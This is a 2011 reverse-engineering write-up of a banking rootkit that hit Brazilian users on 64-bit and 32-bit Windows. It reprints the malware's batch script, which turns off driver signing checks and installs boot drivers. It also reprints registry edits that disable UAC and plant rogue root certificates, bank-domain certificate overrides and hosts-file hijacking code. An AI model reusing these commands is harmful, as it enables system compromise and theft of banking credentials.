Zoom Icon

Rootkit 64bit Banker

From UIC Archive

Rootkit Banker Win64.Banker and Win32.Banker Analysis

Contents


Rootkit 64bit Banker
Author: Evilcry
Email: xxx
Website: -
Date: 23/05/2011 (dd/mm/yyyy)
Level: Luck and skills are required
Language: English Flag English.gif
Comments: yyy



Introduzione

Rootkit Banker Win64.Banker Reverse Engineering, this is the first rootkit able to steal banking account credentials even on x64 systems. We'll take a look into the functionalities of this interesting rootkit, focusing mainly on the techniques used to disable UAC, to install the certificate and to steal information from the infected machines.



Tools & Files


Essay

In the past few days SecureList reported the discovery of the First Rootkit Banker created to Infect also x64 systems.

The attack vector was a malicious applet placed on a Brazilian website. Here its malicious content:

  • aaa.bat
  • add.reg
  • bcdedit.exe
  • cert_override.txt
  • plusdriver.sys
  • plusdriver64.sys

Let's view the content of aaa.bat

@echo off @break off

cmd /c %tmp%\\bcdedit.exe -set loadoptions DDISABLE_INTEGRITY_CHECKS

cmd /c %tmp%\\bcdedit.exe -set TESTSIGNING ON

cmd /c copy %tmp%\\plusdriver64.sys %windir%\\SysWOW64\\drivers

cmd /c copy %tmp%\\plusdriver.sys %windir%\\System32\\drivers

cmd /c sc create driverusbplus64 binPath= "SysWOW64\drivers\plusdriver64.sys" group= "Act Plus Group" type= kernel start= boot error= normal DisplayName= "driverusbplus64"

cmd /c sc create driverusbplus binPath= "System32\drivers\plusdriver.sys" group= "Act Plus Group" type= kernel start= boot error= normal DisplayName= "driverusbplus"

cmd /c del %tmp%\\aaa.bat cmd /c del %tmp%\\plusdriver64.sys cmd /c del %tmp%\\plusdriver.sys cmd /c del %tmp%\\add.reg cmd /c del %tmp%\\bcdedit.exe cmd /c del %tmp%\\cert_override.txt

As you can see first operation performed by the .bat file is in order:

  • Disable Integrity Checks
  • Enable Test Signing

by using bcdedit.exe which is delivered as component of the malicious applet, this operation allow uncertified drivers to run on the victim machine.

Successively the two malicious drivers are copied and Service is Created under the name of:

  • driverusbplus64 -> x64 Edition
  • driverusbplus -> 32 bit Edition

At this point components are no longer required because infection has been completed.

Let's see now the content of add.reg

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] "EnableLUA"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\26ED6B892DA143F2A6B9E036C5CDDF85CBC0765D] "Blob"=hex:04,00,00,00,01,00,00,00,10,00,00,00,77,b4,55,9c,b0,8a,a6,19,b8,8b

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\82BBA26B4E65F5ECA46D1A8A96680EAC6CC558DF]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A3619459A05A7696ABF500F1E596C2B10278BB00]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2449D76A4EEB649EFA77358A44D614324C160173]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6F5D9C2F1EF3EC72A6958E69C19FF80E54AB00FC]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Sistema Operacional"="cmd.exe /c %tmp%/aaa.bat"

Immediate effects of add.reg installations are:

  • Disable UAC
  • Add Rogue CAs ( Certificate Authority )
  • Add on Auto Run the previously seen bat script
  • According to the last registry entry (Sistema Operacional) emerges an attack targeted against Brazilian Systems.

Let's now check the content of cert_override.txt

PSM Certificate Override Settings file This is a generated file! Do not edit.

  • aa-com.br:443 OID.2.16.840.1.101.3.4.2.1 3C:23:38:F5:22:D9:08:4C:C5:B8:0E:57:8B:D4:48:1B:AF:01:7E:B2:66:14:73:BA:C1:2C:6B:54:3E:C6:45:23 U AAAAAAAAAAAAAAAJAAAAlwDTFj2UMAKwJjCBlDELMAkGA1UEBhMCQlIxCzAJBgNV BAgTAkJSMQswCQYDVQQHEwJCUjEYMBYGA1UEChMPQmFuY28gZG8gQnJhc2lsMRgw FgYDVQQLEw9CYW5jbyBkbyBCcmFzaWwxFzAVBgNVBAMTDmFhcGouYmIuY29tLmJy MR4wHAYJKoZIhvcNAQkBFg9hZG1pbkBiYi5jb20uYnI=
  • www2.ba-com.br:443 OID.2.16.840.1.101.3.4.2.1 B1:60:6B:16:AE:05:97:CF:C2:9E:9F:64:B3:ED:5A:3B:96:96:26:7A:50:CF:3F:59:7F:5D:68:8D:AC:40:B0:7E U AAAAAAAAAAAAAAAJAAAAqQCWmefg4+jusjCBpjELMAkGA1UEBhMCQnIxCzAJBgNV BAgTAkJyMQswCQYDVQQHEwJCcjEYMBYGA1UEChMPQmFuY28gRG8gQnJhc2lsMRgw FgYDVQQLEw9CYW5jbyBEbyBCcmFzaWwxIDAeBgNVBAMTF3d3dzIuYmFuY29icmFz aWwuY29tLmJyMScwJQYJKoZIhvcNAQkBFhhhZG1pbkBiYW5jb2JyYXNpbC5jb20u YnI=
  • www.san-et.com.br:443 OID.2.16.840.1.101.3.4.2.1 4E:B1:30:D0:F5:CB:37:EA:5B:3A:70:27:5D:EA:D3:B8:9D:52:55:BA:EA:6B:D6:CF:DC:47:7F:41:A0:D0:04:FA U AAAAAAAAAAAAAAAJAAAAvgCtCNFJH17bZTCBuzELMAkGA1UEBhMCQlIxCzAJBgNV BAgTAlJKMRcwFQYDVQQHEw5SaW8gZGUgSmFuZWlybzEcMBoGA1UEChMTQmFuY28g U2FudGFuZGVyIFMuQTEcMBoGA1UECxMTQmFuY28gU2FudGFuZGVyIFMuQTEgMB4G A1UEAxMXd3d3LnNhbnRhbmRlcm5ldC5jb20uYnIxKDAmBgkqhkiG9w0BCQEWGWFk bWluQHNhbnRhbmRlcm5ldC5jb20uYnI=
  • www.rea-eb.com.br:443 OID.2.16.840.1.101.3.4.2.1 2A:D1:8A:48:FA:81:06:2D:1D:AA:1B:B7:25:E8:C3:2E:5B:5A:11:C9:44:6C:1D:2E:48:AE:9A:9E:48:CF:BC:0B U AAAAAAAAAAAAAAAJAAAArQC68leJv23v6jCBqjELMAkGA1UEBhMCQlIxCzAJBgNV BAgTAkJSMQswCQYDVQQHEwJCUjEdMBsGA1UEChMUQmFuY28gU2FudGFuZGVyIFJl YWwxHTAbBgNVBAsTFEJhbmNvIFNhbnRhbmRlciBSZWFsMSEwHwYDVQQDExh3d3cu cmVhbHNlY3VyZXdlYi5jb20uYnIxIDAeBgkqhkiG9w0BCQEWEWFkbWluQHJlYWwu Y29tLmJy
  • www2.re-eb.com.br:443 OID.2.16.840.1.101.3.4.2.1 82:BC:F7:9C:21:AF:85:6F:2F:24:C9:99:7B:CA:BA:AA:53:17:9A:DA:2A:7B:93:E4:4D:F5:3A:44:0C:7B:28:F6 U AAAAAAAAAAAAAAAJAAAAqwCqgLdcza1zmjCBqDELMAkGA1UEBhMCQlIxCzAJBgNV BAgTAkJSMQswCQYDVQQHEwJCUjEdMBsGA1UEChMUQmFuY28gU2FudGFuZGVyIFJl YWwxHTAbBgNVBAsTFEJhbmNvIFNhbnRhbmRlciBSZWFsMSIwIAYDVQQDExl3d3cy LnJlYWxzZWN1cmV3ZWIuY29tLmJyMR0wGwYJKoZIhvcNAQkBFg5hZEByZWFsLmNv bS5icg==

cert_override.txt is a text file generated in the user profile to store certificate exceptions specified by the user. This file is used by Firefox, Thunderbird, and other XUL-based applications.

Fields are separated by a TAB and has the following meaning:

  • Domain Name
  • OID -> Hash Algorithm
  • Certificate Fingerprint
  • Override Type
  • Certificate Serial Number

In our case override type is U which corresponds to allow untrusted certs (whether it's self signed cert or a missing or invalid issuer cert).

Finally we can move on driver analysis, the so called rootkit component.

Executable Details

  • FileSize: 23.38 KB (23936 bytes)
  • MD5: F35107DCEDC8366A0709B5FCC56F0611
  • SHA-1: B43AD83182B7B798001F4BDD67BF6F4F92F53587

The driver ( I don't like to call it rootkit because it has no hiding capabilities ) is very simple and clean, analysis is also easy due to the presence of Debugging Informations. Entire code is placed into the DriverEntry (the main of every driver) routine. Let's fastly see what happens.

INIT:000154BE mov edi, edi INIT:000154C0 push ebp INIT:000154C1 mov ebp, esp INIT:000154C3 call sub_15485 INIT:000154C8 pop ebp INIT:000154C9 jmp sub_10490

Following jmp sub_10490 we land to the core routine:

.text:000104A6 push offset aDeviceHarddisk ; "\\Device\\HarddiskVolume1\Arquivos de pro"... .text:000104AB call sub_11FE0 .text:000104B0 push offset aLu  ; "lu" .text:000104B5 push 64h .text:000104B7 push offset aDeviceHarddisk ; "\\Device\\HarddiskVolume1\Arquivos de pro"... .text:000104BC call sub_11FE0 .text:000104C1 push offset aGinGb  ; "gin\\gb" .text:000104C6 push 64h .text:000104C8 push offset aDeviceHarddisk ; "\\Device\\HarddiskVolume1\Arquivos de pro"... .text:000104CD call sub_11FE0 .text:000104D2 push offset aIeh  ; "ieh" .text:000104D7 push 64h .text:000104D9 push offset aDeviceHarddisk ; "\\Device\\HarddiskVolume1\Arquivos de pro"... .text:000104DE call sub_11FE0 .text:000104E3 push offset aAbn_dll ; "Abn.dll"

Here is a very long list of assembled strings, root string per category are:

  • \Device\HarddiskVolume1\Arquivos de programas\
  • \Device\HarddiskVolume1\Program Files\
  • \Device\HarddiskVolume1\Program Files (x86)\
  • \Device\HarddiskVolume1\windows\Downloaded Program Files
  • \\Device\\HarddiskVolume1\\Windows\\system32\\drivers\\etc\\hosts
  • \\Registry\\Machine\\System\\CurrentControlSet\\Services\\GbpKm
  • \\Registry\\Machine\\System\\ControlSet001\\Services\\GbpKm
  • \\Device\\HarddiskVolume1\\windows\\system32\\drivers\\GbPlugin\\gbieh.gmd

Especially from latest strings emerges the awareness for G-Buster Browser Defense component an application used by some Brazilian Banks to protect their customer from Trojan Bankers. The second most interesting string is the one that represents the path to etc\hosts file.

ZwUnloadDriver(&ControlSetService);

 ObjectAttributes.Length = 24;
 ObjectAttributes.RootDirectory = 0;
 ObjectAttributes.Attributes = 576;
 ObjectAttributes.ObjectName = &EtcHosts;
 ObjectAttributes.SecurityDescriptor = 0;
 ObjectAttributes.SecurityQualityOfService = 0;
 if ( KeGetCurrentIrql() )
 {
   result = STATUS_INVALID_DEVICE_STATE;
 }
 else
 {
   if ( ZwCreateFile(&FileHandle, 0x40000000u, &ObjectAttributes, &IoStatusBlock,
 0, 0x80u, 0, 5u, 0x20u, 0, 0) >= 0 )

After component unloading the Etc\Hosts file is opened and via ZwWriteFile and file is updated with new malicous values.

Remaining flow of the driver is the same from a functional point of view, some registry key is cleared, files deleted and drivers unloaded.

From Hosts emerged the following configuration:

  • 216.155.- www2.banc-m.br
  • 216.155.- a-com.br

Same operations are obviously performed by the x64 driver edition.

As you have seen driver functionality is very basic and can be resumed into two main functions:

  • Clear G-Buster Browser Presence
  • Alterate Hosts configuration


Disclaimer

I documenti qui pubblicati sono da considerarsi pubblici e liberamente distribuibili, a patto che se ne citi la fonte di provenienza. Tutti i documenti presenti su queste pagine sono stati scritti esclusivamente a scopo di ricerca, nessuna di queste analisi è stata fatta per fini commerciali, o dietro alcun tipo di compenso. I documenti pubblicati presentano delle analisi puramente teoriche della struttura di un programma, in nessun caso il software è stato realmente disassemblato o modificato; ogni corrispondenza presente tra i documenti pubblicati e le istruzioni del software oggetto dell'analisi, è da ritenersi puramente casuale. Tutti i documenti vengono inviati in forma anonima ed automaticamente pubblicati, i diritti di tali opere appartengono esclusivamente al firmatario del documento (se presente), in nessun caso il gestore di questo sito, o del server su cui risiede, può essere ritenuto responsabile dei contenuti qui presenti, oltretutto il gestore del sito non è in grado di risalire all'identità del mittente dei documenti. Tutti i documenti ed i file di questo sito non presentano alcun tipo di garanzia, pertanto ne è sconsigliata a tutti la lettura o l'esecuzione, lo staff non si assume alcuna responsabilità per quanto riguarda l'uso improprio di tali documenti e/o file, è doveroso aggiungere che ogni riferimento a fatti cose o persone è da considerarsi PURAMENTE casuale. Tutti coloro che potrebbero ritenersi moralmente offesi dai contenuti di queste pagine, sono tenuti ad uscire immediatamente da questo sito.

Vogliamo inoltre ricordare che il Reverse Engineering è uno strumento tecnologico di grande potenza ed importanza, senza di esso non sarebbe possibile creare antivirus, scoprire funzioni malevole e non dichiarate all'interno di un programma di pubblico utilizzo. Non sarebbe possibile scoprire, in assenza di un sistema sicuro per il controllo dell'integrità, se il "tal" programma è realmente quello che l'utente ha scelto di installare ed eseguire, né sarebbe possibile continuare lo sviluppo di quei programmi (o l'utilizzo di quelle periferiche) ritenuti obsoleti e non più supportati dalle fonti ufficiali.